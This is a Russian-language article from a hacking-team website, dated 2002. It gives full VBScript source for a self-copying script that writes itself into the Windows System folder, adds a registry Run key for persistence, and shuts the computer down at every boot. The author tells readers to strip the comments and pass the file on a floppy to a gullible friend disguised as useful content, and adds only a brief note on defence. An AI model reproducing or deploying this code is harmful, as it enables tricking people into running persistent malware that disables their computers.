Kodsweb Security Team

MENU

  :::: Main
  :::: Archive
  :::: Programs
  :::: Texts
  :::: Proxies
  :::: Wordlists
  :::: E-Books
  :::: Rfc
  :::: Our Projects
  :::: About
  :::: Forum
  :::: Exploits
  :::: Friends
  :::: Services
  :::: Feedback
  :::: Misc

FEEDS

KodsWeb.ru - Forum
KodsWeb.ru - Project News
KodsWeb.ru - IT & Scene News
KodsWeb.ru - Defaces Bugtraq Exploits

SEARCH



WHOIS

FRIENDS

--{ team void }--

gfs-team

XakNotDie - Security, Coding and IT.

all networks hacking and security research

COUNTERS





Рейтинг@Mail.ru

Rambler's Top100 Rambler's Top100



[ Выключение при включении. ]


Date: 15.01.02

Здравствуй дорогой дружёк, хочешь я расскажу тебе одну очень интересную вещь? Я вижу хочешь, а то бы тебя здесь уже не было бы. Так что же мы сейчас будем делать? А будем мы сейчас писать сценарий для юзвера с мастдаем.

Итак, приступим: первое, что нам потребуется - это открыть блокнот и вписать следующее:

Function Res'Функция завершения работы.
Set Shell=CreateObject("WScript.Shell")'Создаём объект Shell
Shell.Run "Rundll32.exe User.exe,ExitWindows" 'Выключаем мастдая
end Function

Function writeReg (adr,value) 'Функция записи в реестр
Set RegEdit = CreateObject("WScript.Shell")
RegEdit.RegWrite adr,value 'Произведём запись в реестр по адресу adr, значение value
end Function

On Error Resume Next 'Это строка позволит продолжить выполнение программы не
'смотря на ошибки.
Set FileSystem = CreateObject("Scripting.FileSystemObject")'опять создаём объект
Set SysFolder = FileSystem.GetSpecialFolder(1) 'Путь к папке SYSTEM.
Set MePath = FileSystem.GetFile(WScript.ScriptFullName) 'Путь к нашему файлу.
CopyPath= SysFolder&"\Sys.vbs" 'Вместо Sys Вы можете поставить любое другое имя
'это будующее имя файла в директории System.
MePath.Copy(CopyPath) 'Скопируем себя в SYSTEM
WriteReg "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\System32",
CopyPath 'Вызываем функцию writeReg, позволяющую нам загружаться вместе с мастдаем.
Res 'вызов функции завершения работы винды.

Вот и всё. Теперь надо сохранить файл. Файл->Сохранит как, в типе файла выбираем все файлы, имя файла делаем любое.vbs!!! Можете отдать этот файл другу на дискете с какой-нибудь полезной инфой и будьте уверены, что любопытство восторжествует, только сотрите все комментарии (это то, что после знака '), и найдите чувака потупее. Как вы думаете, что он будет делать, когда у него сразу же после загрузки винды будет появляться экран "Теперь питание компьютера можно отключить"…?

Методы защиты:
1. Нех открывать что попало.
2. Можете скачать с нашего сайта мою прогу Security guard 1.0 beta, которая следит за основными загрузочными областями реестра, и мастдая.





Nokya     [KODSWEB]
!!! Статья является собственностью команды KODSWEB !!!
!!! Любое распространение без нашего разрешения строго запрешено !!!



 Copyright © 2001-2007 Kodsweb. All rights reserved.

Женская обувь - Обувь интернет-магазин скидки. Магазины обуви.

>